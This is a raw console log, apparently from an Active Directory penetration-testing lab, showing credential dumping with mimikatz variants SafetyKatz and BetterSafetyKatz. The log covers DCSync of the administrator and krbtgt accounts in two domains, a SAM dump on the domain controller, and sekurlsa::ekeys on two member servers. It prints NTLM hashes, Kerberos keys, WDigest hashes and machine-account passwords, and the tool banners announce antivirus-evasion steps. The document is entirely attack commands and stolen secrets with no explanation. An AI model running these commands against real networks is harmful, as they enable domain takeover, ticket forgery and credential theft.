Domain Admin Dump
PS C:\\AD\\Tools> .\\SafetyKatz.exe '"lsadump::dcsync /user:dcorp\\administrator"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:dcorp\\administrator
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 11/11/2022 7:33:55 AM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-500
Object Relative ID : 500
Credentials:
Hash NTLM: af0686cc0ca8f04df42210c9ac980760
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6a53706d144b585f05e703bf463567bc
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-LOJKLRT8VA4Administrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
aes128_hmac (4096) : 2851a2dcf67dea5217c6fab951633584
des_cbc_md5 (4096) : ae857fd3ec19b63b
OldCredentials
aes256_hmac (4096) : 2e0a4ff15d58c3bba89f032bd85f342c31bfc656b190e054f50690de029653f4
aes128_hmac (4096) : a3b5cb95b4d259fa6e13c9f9067203a9
des_cbc_md5 (4096) : 08ce97c4c720ce0d
OlderCredentials
aes256_hmac (4096) : dcc9a74b4c1fdaafab4a15e39bb0243d1e32b1d759895b19f5b6ecbe5dc7570f
aes128_hmac (4096) : a304a23629c774268a8253ac3bb494b5
des_cbc_md5 (4096) : 1a7332648c738f8a
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-LOJKLRT8VA4Administrator
Credentials
des_cbc_md5 : ae857fd3ec19b63b
OldCredentials
des_cbc_md5 : 08ce97c4c720ce0d
mimikatz(commandline) # exit
Bye!
KRBTGT Dump
PS C:\\AD\\Tools> .\\SafetyKatz.exe '"lsadump::dcsync /user:dcorp\\krbtgt"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:dcorp\\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd
mimikatz(commandline) # exit
Bye!
SAM File Dump on DC
[dcorp-dc]: PS C:\\Users\\Administrator\\Documents> .\\SafetyKatz.exe '"token::elevate"' '"lsadump::sam"' '"exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
616 {0;000003e7} 1 D 17861 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;012d49d2} 0 D 19812734 dcorp\\Administrator S-1-5-21-719815819-3726368948-3917688648-500 (12g,26p) Primary
* Thread Token : {0;000003e7} 1 D 19864231 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870
SAMKey : f3a9473cb084668dcf1d7e5f47562659
RID : 000001f4 (500)
User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
mimikatz(commandline) # exit
Bye!
[dcorp-dc]: PS C:\\Users\\Administrator\\Documents>
mcorp krbtgt
PS C:\\AD\\Tools\\Old_Tools> .\\BetterSafetyKatz.exe '"lsadump::dcsync /user:mcorp\\krbtgt /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local"'
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:mcorp\\krbtgt /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502
Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f
* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9
* Primary:Kerberos *
Default Salt : MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : c20dc80d51f7abd9
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 49fec950691bbeba1b0d33d5a48d0293
02 0b0c4dbc527ee3154877e070d043cd0d
03 987346e7f810d2b616da385b0c2549ec
04 49fec950691bbeba1b0d33d5a48d0293
05 0b0c4dbc527ee3154877e070d043cd0d
06 333eda93ecfba8d60c57be7f59b14c62
07 49fec950691bbeba1b0d33d5a48d0293
08 cdf2b153a374773dc94ee74d14610428
09 cdf2b153a374773dc94ee74d14610428
10 a6687f8a2a0a6dfd7c054d63c0568e61
11 3cf736e35d2a54f1b0c3345005d3f962
12 cdf2b153a374773dc94ee74d14610428
13 50f935f7e1b88f89fba60ed23c8d115c
14 3cf736e35d2a54f1b0c3345005d3f962
15 06c616b2109569ddd69c8fc00c6a413c
16 06c616b2109569ddd69c8fc00c6a413c
17 179b9c2fd5a34cbb6013df534bf05726
18 5f217f838649436f34bbf13ccb127f44
19 3564c9de46ad690b83268cde43c21854
20 1caa9da91c85a1e176fb85cdefc57587
21 27b7de3c5a16e7629659152656022831
22 27b7de3c5a16e7629659152656022831
23 65f5f95db76e43bd6c4ad216b7577604
24 026c59a45699b631621233cb38733174
25 026c59a45699b631621233cb38733174
26 342a52ec1d3b39d90af55460bcda72e8
27 ef1e1a688748f79d16e8e32318f51465
28 9e93ee8e0bcccb1451face3dba22cc69
29 480da975c1dfc76717a63edc6bb29d7b
mimikatz #
mcorp Administraor
PS C:\\AD\\Tools\\Old_Tools> .\\BetterSafetyKatz.exe '"lsadump::dcsync /user:mcorp\\Administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local"'
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:mcorp\\Administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 11/11/2022 7:33:23 AM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-500
Object Relative ID : 500
Credentials:
Hash NTLM: 71d04f9d50ceb1f64de7a09f23e6dc4c
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : fd1efebb8f6a43ec25bc21dd68e762bf
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-R6HGNL110DLAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0
aes128_hmac (4096) : 294d631dda15cc844b48a18a51f0e85e
des_cbc_md5 (4096) : ba4a1abc01d3ec9d
OldCredentials
aes256_hmac (4096) : 944f2ae7f0ecfeac6b494c44ef4b02fa6bbad1c65849f4aea40ed33cd7242f84
aes128_hmac (4096) : 57493a76eaf1bdcec3f310305773fbc3
des_cbc_md5 (4096) : 9b7586022fab5431
OlderCredentials
aes256_hmac (4096) : 3ee5808422b219225ab963c722f79f409835cd6a9a88408dd8fccb600b62508e
aes128_hmac (4096) : 5eed578bc4fe22ecb57f2a5c96f66bc2
des_cbc_md5 (4096) : cb57857c52676ba1
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-R6HGNL110DLAdministrator
Credentials
des_cbc_md5 : ba4a1abc01d3ec9d
OldCredentials
des_cbc_md5 : 9b7586022fab5431
mimikatz #
dcorp-mssql Dump
PS C:\\users\\public> .\\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Slowly mapping ADVAPI32.dll
[+] Slowly mapping Cabinet.dll
[+] Slowly mapping CRYPT32.dll
[+] Slowly mapping cryptdll.dll
[+] Slowly mapping DNSAPI.dll
[+] Slowly mapping FLTLIB.DLL
[+] Slowly mapping MPR.dll
[+] Slowly mapping NETAPI32.dll
[+] Slowly mapping ODBC32.dll
[+] Slowly mapping ole32.dll
[+] Slowly mapping OLEAUT32.dll
[+] Slowly mapping RPCRT4.dll
[+] Slowly mapping SHLWAPI.dll
[+] Slowly mapping SAMLIB.dll
[+] Slowly mapping Secur32.dll
[+] Slowly mapping SHELL32.dll
[+] Slowly mapping USER32.dll
[+] Slowly mapping USERENV.dll
[+] Slowly mapping VERSION.dll
[+] Slowly mapping HID.DLL
[+] Slowly mapping SETUPAPI.dll
[+] Slowly mapping WinSCard.dll
[+] Slowly mapping WINSTA.dll
[+] Slowly mapping WLDAP32.dll
[+] Slowly mapping advapi32.dll
[+] Slowly mapping msasn1.dll
[+] Slowly mapping ntdll.dll
[+] Slowly mapping netapi32.dll
[+] Slowly mapping KERNEL32.dll
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 318848 (00000000:0004dd80)
Session : RemoteInteractive from 2
User Name : sqladmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:44:11 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1113
* Username : sqladmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a4ca89db48cb0d724e6394fd62181a0cd3b7544885bdd7d03bfc00f269c07d26
rc4_hmac_nt 07e8be316e3da9a042a9cb681df19bf5
rc4_hmac_old 07e8be316e3da9a042a9cb681df19bf5
rc4_md4 07e8be316e3da9a042a9cb681df19bf5
rc4_hmac_nt_exp 07e8be316e3da9a042a9cb681df19bf5
rc4_hmac_old_exp 07e8be316e3da9a042a9cb681df19bf5
Authentication Id : 0 ; 301735 (00000000:00049aa7)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:44:01 PM
SID : S-1-5-96-0-2
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-MSSQL$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:36:25 PM
SID : S-1-5-20
* Username : dcorp-mssql$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 313d23121165b3cbceb17b95dddd5b132727446bfd5200f6dde96a1d3eb4c3bf
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 55382 (00000000:0000d856)
Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/20/2024 11:36:29 PM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 20905 (00000000:000051a9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:36:25 PM
SID : S-1-5-96-0-0
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 20851 (00000000:00005173)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:36:25 PM
SID : S-1-5-96-0-1
* Username : DCORP-MSSQL$
* Domain : dollarcorp.moneycorp.local
* Password : liewB@Xr% _bGCN&2^p^ Sq!0uC*K2pwh1su1L"<A>,\\Z/"g4I"-JcTGDswG"B.[bPPE?'Pz`8yrYQ,a]/)--\\@*@0;U2M]4Uo,=pFx(V46D/Bz0KRo=5X3j
* Key List :
aes256_hmac 3cc44d0941bf91481d23632207b32564e487e1944e55f1117f70a8da43e9648d
aes128_hmac 41a5eb0d3933d88a664828437b510470
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-MSSQL$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:36:24 PM
SID : S-1-5-18
* Username : dcorp-mssql$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 313d23121165b3cbceb17b95dddd5b132727446bfd5200f6dde96a1d3eb4c3bf
rc4_hmac_nt b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old b205f1ca05bedace801893d6aa5aca27
rc4_md4 b205f1ca05bedace801893d6aa5aca27
rc4_hmac_nt_exp b205f1ca05bedace801893d6aa5aca27
rc4_hmac_old_exp b205f1ca05bedace801893d6aa5aca27
mimikatz(commandline) # exit
Dumping dcorp-ciadmin
PS C:\\users\\ciadmin> .\\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Slowly mapping ADVAPI32.dll
[+] Slowly mapping Cabinet.dll
[+] Slowly mapping CRYPT32.dll
[+] Slowly mapping cryptdll.dll
[+] Slowly mapping DNSAPI.dll
[+] Slowly mapping FLTLIB.DLL
[+] Slowly mapping MPR.dll
[+] Slowly mapping NETAPI32.dll
[+] Slowly mapping ODBC32.dll
[+] Slowly mapping ole32.dll
[+] Slowly mapping OLEAUT32.dll
[+] Slowly mapping RPCRT4.dll
[+] Slowly mapping SHLWAPI.dll
[+] Slowly mapping SAMLIB.dll
[+] Slowly mapping Secur32.dll
[+] Slowly mapping SHELL32.dll
[+] Slowly mapping USER32.dll
[+] Slowly mapping USERENV.dll
[+] Slowly mapping VERSION.dll
[+] Slowly mapping HID.DLL
[+] Slowly mapping SETUPAPI.dll
[+] Slowly mapping WinSCard.dll
[+] Slowly mapping WINSTA.dll
[+] Slowly mapping WLDAP32.dll
[+] Slowly mapping advapi32.dll
[+] Slowly mapping msasn1.dll
[+] Slowly mapping ntdll.dll
[+] Slowly mapping netapi32.dll
[+] Slowly mapping KERNEL32.dll
[+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 134514 (00000000:00020d72)
Session : Service from 0
User Name : ciadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:35:49 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1121
* Username : ciadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 1bbe86f1b5285109dd1450b55ed8851c220b81cc187f9af64e4048ed25083879
rc4_hmac_nt e08253add90dccf1a208523d02998c3d
rc4_hmac_old e08253add90dccf1a208523d02998c3d
rc4_md4 e08253add90dccf1a208523d02998c3d
rc4_hmac_nt_exp e08253add90dccf1a208523d02998c3d
rc4_hmac_old_exp e08253add90dccf1a208523d02998c3d
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-CI$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:36 PM
SID : S-1-5-20
* Username : dcorp-ci$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 20746 (00000000:0000510a)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:35 PM
SID : S-1-5-96-0-0
* Username : DCORP-CI$
* Domain : dollarcorp.moneycorp.local
* Password : 6V=+L&GQNU;"au(VO9%jq<_^=F`3JqMC"P!Q0ho[Iq[(Cum]rS%jKK(#-]d-hrI<nB6vVo"DLgEwEY:*c`Q>`3>RCun/3^$rc4N(eEk"$WEtwqZh[8&/KH\\t
* Key List :
aes256_hmac e5fe14a5019f866e6618092bd6c29958fdbdaa6f3dabc1bc9f6c42164b16a080
aes128_hmac 86831a80fa8028ceed42f2fbc93bf94d
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 349379 (00000000:000554c3)
Session : RemoteInteractive from 2
User Name : ciadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:43:13 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1121
* Username : ciadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 1bbe86f1b5285109dd1450b55ed8851c220b81cc187f9af64e4048ed25083879
rc4_hmac_nt e08253add90dccf1a208523d02998c3d
rc4_hmac_old e08253add90dccf1a208523d02998c3d
rc4_md4 e08253add90dccf1a208523d02998c3d
rc4_hmac_nt_exp e08253add90dccf1a208523d02998c3d
rc4_hmac_old_exp e08253add90dccf1a208523d02998c3d
Authentication Id : 0 ; 332770 (00000000:000513e2)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:43:07 PM
SID : S-1-5-96-0-2
* Username : DCORP-CI$
* Domain : dollarcorp.moneycorp.local
* Password : 6V=+L&GQNU;"au(VO9%jq<_^=F`3JqMC"P!Q0ho[Iq[(Cum]rS%jKK(#-]d-hrI<nB6vVo"DLgEwEY:*c`Q>`3>RCun/3^$rc4N(eEk"$WEtwqZh[8&/KH\\t
* Key List :
aes256_hmac e5fe14a5019f866e6618092bd6c29958fdbdaa6f3dabc1bc9f6c42164b16a080
aes128_hmac 86831a80fa8028ceed42f2fbc93bf94d
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 20702 (00000000:000050de)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:35 PM
SID : S-1-5-96-0-1
* Username : DCORP-CI$
* Domain : dollarcorp.moneycorp.local
* Password : 6V=+L&GQNU;"au(VO9%jq<_^=F`3JqMC"P!Q0ho[Iq[(Cum]rS%jKK(#-]d-hrI<nB6vVo"DLgEwEY:*c`Q>`3>RCun/3^$rc4N(eEk"$WEtwqZh[8&/KH\\t
* Key List :
aes256_hmac e5fe14a5019f866e6618092bd6c29958fdbdaa6f3dabc1bc9f6c42164b16a080
aes128_hmac 86831a80fa8028ceed42f2fbc93bf94d
rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-CI$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:35 PM
SID : S-1-5-18
* Username : dcorp-ci$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
